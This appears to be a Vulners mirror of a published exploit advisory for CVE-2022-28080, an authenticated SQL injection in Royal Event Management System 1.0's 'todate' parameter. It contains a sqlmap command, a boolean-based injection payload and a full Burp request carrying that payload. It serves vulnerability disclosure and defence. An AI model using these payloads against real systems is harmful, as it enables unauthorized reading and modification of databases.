Vulners
Lucene search
Royal Event Management System 1.0 SQL Injection
🗓️ 12 May 2022 00:00:00Reported by Eren GozaydinType 
packetstorm🔗 packetstormsecurity.com👁 250 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2022-28080 | 5 May 202217:15 | – | attackerkb |
 | CVE-2022-28080 | 5 May 202220:42 | – | circl |
 | Royal Event Management System SQL注入漏洞 | 5 May 202200:00 | – | cnnvd |
 | Royal Event Management System SQL Injection Vulnerability | 9 May 202200:00 | – | cnvd |
 | CVE-2022-28080 | 5 May 202216:06 | – | cve |
 | CVE-2022-28080 | 5 May 202216:06 | – | cvelist |
 | Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) | 12 May 202200:00 | – | exploitdb |
 | Royal Event - SQL Injection | 6 Jun 202603:01 | – | nuclei |
 | CVE-2022-28080 | 5 May 202217:15 | – | nvd |
 | CVE-2022-28080 | 5 May 202217:15 | – | osv |
10
`# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
# Date: 2022-26-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28080
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080
------------------------------------------------------------------------------------
1. Description:
----------------------
Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in
/royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'todate' parameter and save it like poc.txt. Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
(boolean-based)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
4. Burpsuite request:
----------------------
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 May 2022 00:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 26.5
CVSS 3.18.8
EPSS0.44758